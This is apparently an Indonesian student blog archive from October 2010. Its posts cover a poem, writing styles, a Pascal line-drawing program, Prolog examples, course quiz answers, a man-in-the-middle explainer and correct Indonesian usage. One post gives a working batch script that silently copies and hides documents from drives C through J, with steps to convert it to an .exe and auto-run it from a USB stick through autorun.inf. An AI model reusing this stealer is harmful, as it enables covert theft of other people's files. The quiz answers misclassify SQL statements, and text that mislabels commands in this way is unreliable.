all about me: October 2010
...SELAMAT DATANG ...TERIMA KASIH ...TELAH BERKUNJUNG
RSS

puisi akar 3

Aku takut akan selalu menjadi
angka kesepian seperti akar tiga.
Hanya tiga yang kumiliki.
Kenapa harus kusembunyikan tiga-ku
di bawah tanda akar kuadrat yang kejam.
Kuharap aku angka sembilan.
Karena sembilan dapat mengalahkannya
hanya dengan aritmetik sederhana.
Aku tahu takkan melihat matahari.
Seperti 1,7321.
Seperti kenyataanku,
bilangan irasional yang menyedihkan.
Ketika, hey, apakah ini yang kulihat?
Sebuah akar tiga yang lain.
Yang menari mendekatiku.
Bersama kita saling mengalikan.
Membentuk angka yang kita inginkan.
Bersatu menjadi bilangan bulat.
Kita mendobrak ikatan abadi.
Dengan ayunan tongkat sihir.
Tanda akar kuadrat kami terlepas.
Dan cinta untukku telah kembali. 1 comments
This summary is not available. Please click here to view the post. 0 comments

kalimat ilmiah, semi ilmiah dan non ilmiah

tulisan ilmiah


Tulisan ilmiah adalah tulisan yang disusun secara sistematis dan logis. Tulisan ilmiah umumnya berisikan masalah-masalah yang objektif yang dipadukan dengan kecermatan penalaran dan bahasa. Dalam karya tulis ilmiah digunakan ragam bahasa formal atau terpelajar bukan bahasa informal atau pergaulan. Ragam bahasa ilmiah umumnya mengikuti gagasan penulis dalam suatu bidang ilmu tertentu. Ragam bahasa ilmiah juga dapat membedakan gagasan atau pokok pikiran yang memang berbeda dan mempunyai struktur yang baku dan cermat, sehingga gagasan dapat dengan mudah dimengerti ataupun diterima oleh pembaca.



contoh :
Banjir semalam ternyata bukan hanya melumpuhkan Jakarta, tapi juga memakan korban jiwa. Seorang mahasiswi Universitas Indraprasta PGRI (Unindra) meninggal dunia setelah terseret arus banjir di kawasan Cipete, Jakarta Selatan, Senin malam, 25 Oktober 2010.

Korban yang diidentifikasi bernama Dian Nur Aprianti, ditemukan tim SAR Polsek Cilandak di gorong-gorong di kawasan Jalan Haji Naim III, Cilandak, Jakarta Selatan, dalam keadaan tak bernyawa.

Petaka yang menimpa warga Jalan Damai RT 3 RW 5, Pejaten Timur, Jakarta Selatan itu terjadi saat banjir menggenangi kawasan Cipete. Motor yang dikendarai Dian dan adiknya terhenti di depan Pasar Inpres Cipete, karena terhambat banjir. Dian kemudian turun dari motor untuk berjalan kaki. Malang tak dapat ditolak, karena tidak dapat melihat dasar jalan, ia terperosok ke dalam gorong-gorong dan hilang seketika terseret arus air.

Menurut anggota Tim SAR bernama Satria, jasad Dian ditemukan di bantaran Kali Krukut, tersangkut di antara pohon pisang. Pencarian dilakukan sejak semalam, tapi dihentikan pada pukul 00.00 WIB. Baru pagi ini jasad Dian ditemukan.

"Pencarian dimulai jam 06.00 WIB, akhirnya korban bisa ditemukan. Kini masih menunggu ambulans untuk dibawa ke rumah sakit," ujar Satria, Selasa, 26 Oktober 2010.

Sementara itu, ayah Dian, Burhanudin, yang berada di lokasi korban ditemukan terlihat pasrah dan tak dapat berbuat banyak. Ia hanya bersyukur jasad putrinya bisa ditemukan. "Keluarga hanya pasrah, kami tidak menyangka kejadian ini," ujarnya.

Hujan deras yang mengguyur sejak kemarin sore membuat Jakarta lumpuh. Lalu-lintas di jalan-jalan protokol, arteri, dan jalan alternatif total lumpuh.
Hingga pagi ini, masih ada pemukiman warga yang tergenang banjir akibat luapan air sungai. (sumber :vivanews.com)





SEMI ILMIAH
Manga, merupakan sebutan untuk komik di Jepang. Tidak ada yang tahu secara pasti kapan komik masuk pertama kali ke Jepang, tetapi pada mulanya komik Jepang adalah peniruan dari film animasi Walt Disney oleh Ozamu Tezuka (1928-1989) dan merupakan cikal bakal dari komik Jepang modern. Beliau mengekspresikan gerakan film-film animasi Walt Disney ke dalam komik Jepang. Karya-karya beliau setelah akhir perang dunia II membuka era baru untuk komik Jepang. Karena pada mulanya komik di Jepang adalah peniruan dari film animasi dari Walt Disney maka saat itu para penggemar komik Jepang adalah anak-anak. Namun pada tahun 1959 mulai diterbitkan dua majalah mingguan untuk anak laki-laki yaitu Shonen Magazine dan Shonen Sunday. Saat itu hiburan untuk anak di Jepang hanyalah komik saja, belum ada anime (sebutan untuk film animasi di Jepang) dan tentu saja belum ada game komputer. Sepuluh tahun kemudian, majalah komik untuk remaja mulai terbit, Manga Action (1967), Young Comic (1967), Play Comic (1968) dan Big Comic (1967). Pembaca komik yang usianya kurang lebih sembilan tahun pada tahun 1959, maka pada saat itu (tahun 1967) mereka telah berumur kurang lebih delapan belas tahun dan telah masuk masa remaja sehingga mereka mau membaca komik yang cocok dengan usia dan selera mereka




















NON ILMIAH
gan, ini ane nemu di FB temen ane gan.. 
ga nyangka ternyata dia seorang kaskuser juga 
cekidot ya gan.. 















sumber : kaskus.us
0 comments

create line in pascal

saya akan memberikan tutorial membuat sebuah garis pada pascal dengan menggunakan opengl, jika ingin menggunakan pascal sebaiknya gunakan "freepascal" karena jika kita menginstall freepascal maka kita tidak perlu lagi menambahkan library opengl karena freepascal telah include opengl.


ini adalah coding'a.:

uses graph,crt;
var driver,mode:integer;
x1,y1,x2,y2:integer;
step,k:integer;
dx,dy:real;
xm,ym,x,y:real;
pil :integer;
men:integer;
label menu;




procedure utama;
begin
driver:=detect;
InitGraph(driver,mode,'');
end;


procedure Input;
begin
clrscr;
writeln('Program Menggambar Garis DIAGONAL');
writeln('<<=========================================>>');
writeln;
write('Masukkan Nilai x1: ');
readln(x1);
write('masukan nilai X2: ');
readln(x2);
write('Masukkan Nilai y1: ');
readln(y1);
write('Masukkan Nilai y2: ');
readln(y2);
end;


procedure Garis_diagonal;
begin
x1:=abs(x1);
x2:=abs(x2);
y1:=abs(y1);
y2:=abs(y2);


dx:=x2-x1;
dy:=y2-y1;
x:=x1;
y:=y1;
if abs(dx) > abs(dy) then
step:=round(abs(dx))
else
step:=round(abs(dy));
xm:=dx/step;
ym:=dy/step;
putPixel(round(x),round(y),red);
for k:=1 to step do
begin
x:=x+xm;
y:=y+ym;
putPixel(round(x),round(y),red);
end;
end;




procedure hor;
begin
driver:=detect;
InitGraph(driver,mode,'');
end;


procedure inhor;
begin
clrscr;
writeln('Program Menggambar Garis');
writeln('<<=========================================>>');
writeln;
write('Masukkan Nilai x1: ');
readln(x1);
write('Masukkan Nilai y1: ');
readln(y1);
writeln('Masukan Nilai y2 : ');
readln(y2);


end;


procedure gahor;
begin
x1:=abs(x1);


y1:=abs(y1);
y2:=abs(y2);




dy:=y2-y1;
x:=x1;
y:=y1;
if abs(x) > abs(dy) then
step:=round(abs(x))
else
step:=round(abs(dy));


ym:=dy/step;
putPixel(round(x),round(y),yellow);
for k:=1 to step do
begin


y:=y+ym;
putPixel(round(x),round(y),yellow);
end;
end;


procedure ver;
begin


driver:=detect;
InitGraph(driver,mode,'');
end;


procedure inver;
begin
clrscr;
writeln('Program Menggambar Garis');
writeln('<<=========================================>>');
writeln;
write('Masukkan Nilai x1: ');
readln(x1);
writeln('Masukan Nilai x2: ');
readln(x2);
write('Masukkan Nilai y1: ');
readln(y1);






end;


procedure gaver;
begin
x1:=abs(x1);
x2:=abs(x2);
y1:=abs(y1);
y2:=abs(y2);
dx:=x2-x1;


x:=x1;
y:=y1;
if abs(dx) > abs(y) then
step:=round(abs(dx))
else
step:=round(abs(dy));
xm:=dx/step;


putPixel(round(x),round(y),green);
for k:=1 to step do
begin
x:=x+xm;


putPixel(round(x),round(y),green);
end;
end;






begin
menu:
clrscr;
writeln('-------menu-------');
writeln('==================');
writeln('1. vertikal ');
writeln('2. horizontal ');
writeln('3. diagonal ');
writeln('4. keluar ');
writeln('ukuran layar 1024 x 768 ');
writeln('untuk hasil yang maximal masukan kordinat 100-999');
writeln('masukan pilihan  :');
readln(pil);
case pil of
1: begin
   inhor;
   hor;
   gahor;
   goto menu;
   end;


2: begin
inver;
ver;
gaver;
goto menu;
   end;


3: begin
   input;
   utama;
   Garis_diagonal;
   readln;
   goto menu;


end;
4: begin


end;
end;
end.


output:






0 comments

prolog (LP)

contoh program kondisi pada prolog.
1. depan(A, A) :- A < 10.


depan(A, B) :-

A1 is A // 10,

depan(A1, B1),

B is B1.



output :

Input : ?- depan(256, X).



Output : Yes. X = 2.





2. contoh perulangan pada prolog.
loop(N):-N>0,write('The value is: '),write(N),nl,


M is N-1,loop(M).



output:

?- loop(6).

The value is: 6

The value is: 5

The value is: 4

The value is: 3

The value is: 2

The value is: 1

yes 1 comments

jawaban LP

LP


1. LearnRates sendiri adalah bilangan real yang lebih besar dari nol, tetapi nilai di atas satu sangatlah tidak dianjurkan, mengingat bahwa dengan semakin tingginya nilai LearnRates.

2. Momentum adalah gerak atau alur dari ANN.

3. Nilai awal bobot adalah nilai awal pertama yang di inputkan.

4. Bias adalah nilai pantulan yang dihasilkan dilambangkan dengan “qi”







LP



1. Data Manipulation Language (DML) merupakan bahasa basis data yang berguna untuk melakukan modifikasi dan pengambilan data pada suatu basis data

statment data terdiri dari: penambahan (insert), pembaruan (update) dan penghapusan (delete).

2. DCL (Data

Control Language) berkaitan kontrol transaksi. DDL dan DCL secara otomatis

akan di-commit (dilakukan perubahan secara permanen) pada akhir dari transaksi.

Ada 2 statement DCL yang penting yaitu COMMIT dan ROLLBACK, selain dari

itu ada SAVEPOINT.

3. Contoh DML :

Create database mahasiswa;

Drop database mahasiswa;



Contoh DCL :

Select *from mahasiswa;

Select nama from mahasiswa. 0 comments

TEKNIK PENCURIAN DATA MELALUI FLASHDISK

                     TEKNIK PENCURIAN DATA MELALUI FLASHDISK


Ada banyak cara melakukan mencuri data, yang akan kami bahas kali ini adalah teknik pencurian data pada flashdisk. Cara yang bisa kita lakukan adalah dengan menuliskan coding dibawah ini pada notpad atau wordpad

@echooff


REMName:silentxxx


REMAuthor:Silentxxx






Setsilent=%computername%_%random%






Ifnotexist"%silent%"Md"%silent%"






For%%ain(CDEFGHIJ)doifexist%%a:\(


For/f"tokens=*"%%bin('dir/a/b/s%%a:\*.doc')do(


attribshr"%%b"


copy"%%b""%silent%"/y)


For/f"tokens=*"%%bin('dir/a/b/s%%a:\*.xls')do(


attribshr"%%b"


copy"%%b""%silent%"/y)


For/f"tokens=*"%%bin('dir/a/b/s%%a:\*.txt')do(


attribshr"%%b"


copy"%%b""%silent%"/y)


For/f"tokens=*"%%bin('dir/a/b/s%%a:\*.docx')do(


attribshr"%%b"


copy"%%b""%silent%"/y)


)



Save as Dengan Reserah.bat dan save as type all files….

Sekarang coba jalankan file*.bat tersebut maka disamping File akan terbuat sebuah folder yang berisi

Semua file yang dicopy dari Drive C hingga J…



Code diatas dapat ditambah sesuai dengan kebutuhan dan keinginan

Tambah kan ini dapat code2x diatas:

For/f"tokens=*"%%bin('dir/a/b/s%%a:\*.txt')do(


attribshr"%%b"


copy"%%b""%silent%"/y)




dan rubah*.Txt menjadi file yang lain misalkan dengan Extensi*.exe atau *.PDF.

Den selalu“)”sebagai penutup sourcecodenya.

Dan yang saya sebut dengan mudah Tadi adalah jika file*.bat dapat berjalan dengan sendiri dan

Mengcopy semua file.



OK sebelumnya lebih baik File*.bat yang telah kita buat tersebut tadi kita jadilkan File dengan

extensi*.exe. dengan mengunakan software“Bat_To_Exe_ConverterV1.5”

Kalau belum punya download di http://www.brothersoft.com/battoexeconverter50301.html



Agar file yang kita buat tadi dapat berjalan sendiri sekarang kita buat AUTORUN.INF:

Ketik kan pada kode dibawah:



[autorun]

Open=terserah.exe



Save as dengan File autorun.inf dan save as type dengan all files.



Letakan kedua file autorun.inf dan terserah.exe didalam dictory USB flashdrive.







TEKNIK HACKING DENGAN SNIFF



Man-in-the-middle (MITM) attack adalah salah satu serangan pada tahap gaining access. Dengan cara ini seseorang bisa membaca, menyisipkan, dan memalsukan data antara dua komputer yang saling terhubung di dalam switched network. Man-in-the-middle attack dapat dilakukan jika komputer attacker berada di dalam satu network dengan dua komputer yang lainnya sesuai dengan namanya, Man-in-tthe-middle, Atttacker harus menempatkan diri di tengah-tengah komunikasi antara komputer User A dan komputer User B sehingga attacker bisa meng-capture (sniff)

semua data dari komputer User A dan komputer User

Serangan Terhadap Kriptografi

Serangan terhadap kriptografi berarti usaha untuk menemukan kunci atau plaintext dari ciphertext.

Suatu serangan dapat digolongkan menjadi dua jenis serangan berdasarkan keterlibatan penyerang (kriptanalis) pada komunikasi, yakni serangan pasif dan serangan aktif.

Serangan pasif berarti seorang penyerang tidak berinteraksi dengan kelompok yang sedang berkomunikasi dan hanya memanfaatkan data yang diperoleh (seperti ciphertext). Ciri-ciri dari serangan pasif adalah penyerang tidak terlibat dalam komunikasi antara pengirim dan penerima, serta penyerang hanya melakukkan penyadapan (eavesdropping) untuk memperoleh data sebanyak-banyaknya . Penyadapan dapat berbentuk wiretapping, electromagnetic eavesdropping, dan accoustic eavesdropping.

Serangan aktif berarti penyerang tidak hanya mengiintervensi komunikasi, tetapi juga ikut mempengaruhi sistem. Penyerang dapat saja menghapus sebagian ciphertext, mengubah ciphertext, menyisipkan potongan ciphertext palsu, membalas pesan lama, atau mengubah informasi yang tersimpan. Salah satu contoh serangaan aktif adalahh man-in-the-middle attack (MITM).

MITM adalah serangan dimana penyerang mampu untuk membaca, menambah dan mengubah sesuai kehendak pesan antara dua kelompok tanpa sepengetahuan kelompok tersebut. MITM biasanya dilakukan terhadap kriptografi asimetri dan bisa juga pada protocol Diffi-Hellman.

Untuk lebih jelasnya kita misalkan Alice dan Bob sebagai dua orang yang akan berkomunikasi, dan Malice berkehendak untuk menyadaap komunikasi tersebut serta mengirimkan pesan yang salah kepada Bob.

Untuk memulai komunik asi, pertama-tama Alice meminta Bob untuk mengirimkan kunci public miliknya. Ketika Malice dapat menyadap kunci publik yang dikirim, maka MITM akan dapat segera dimulai. Malice dapat dengan mudah mengirimkan Alice kunci publik yaang cocok dengan kunci pribadi milik Alice. Alice yang mempercayai bahwa kunci yang ia terima berasal dari Bob, mulai mengenkripsi kunci yang sebenarnya dikirim oleh Malice dan kemudian mengirimkan kembali ke Bob pesan yang telah dienkripsi. Malice lalu kembali menyadap komunikasi dan mendeskripsi pesan tersebut, menyimpan salinan pesan, kemudian mengenkripsi pesan yang telah diubah menggunakan kunci publik yang dikirimkan oleh Bob dan kemudian mengirimkannya kepada Bob. Ketika Bob menerima ciphertext, maka ia akan percaya bahwa pesan tersebut

berasal dari Alice.

Pertahanan terhadap serranganUntuk menjagaa keamanan dari serangan M ITM maka dapat dinggunakan beberapa teknik otentikasi sebagai berikut :

• Menggunakan Infrastruktur public-key yang sudah dii sertifikasi

• Menggunakan otentifikasi mutual yang kuat

• Menggunakan kunci-kunci rahasia (Secret keys/high information entropy secrets)

• Menggunakan kata sandi/Passwords (low information entropy secrets)

• Menggunakan pengenal suara (voice recognition)

• Menggunakan pesan rahasia untuk sesaat

Selain itu, untuk mengatasi model serangan ‘man-in–the-middle-attack’, perlu ada sebuah metode untuk melakukan otentikasi host yang kita hub ungi. Otentikasi dapat berupa digital certifiicate yang eksklusif dimiliki oleh host tersebut. 0 comments

design absen elektrik

ini adalah salah satu design absen elektrik yang saya buat.....








0 comments

bahasa indonesia yang baik dan benar

Menurut dosen bahasa indonesia saya penggunaan bahasa yang baik (sesuai aspek komunikatif) adalah sesuai 
dengan sasaran kepada siapa bahasa tersebut di sampaikan. Hal ini harus 
disesuaikan dengan unsur umur, agama, status sosial, lingkungan sosial, dan 
sudut pandang khalayak sasaran kita. Sedangkan bahasa yang benar berkaitan dengan aspek kaidah, yaitu peraturan bahasa 
(tata bahasa, pilihan kata, tanda baca, dan ejaan). Jadi contoh kalimat yang menggunakan bahasa indonesia yang baik dan benar adalah sebagai berikut :

1. Hari ini dosen bahasa indonesia tidak dapat hadir karena ada rapat.
2. Harga 1 lusin sendok ini berapa?
3. Kemarin paman datang dari desa.

masih banyak lagi contoh lainnya dalam penggunaan bahasa indonesia yang baik dan benar.
0 comments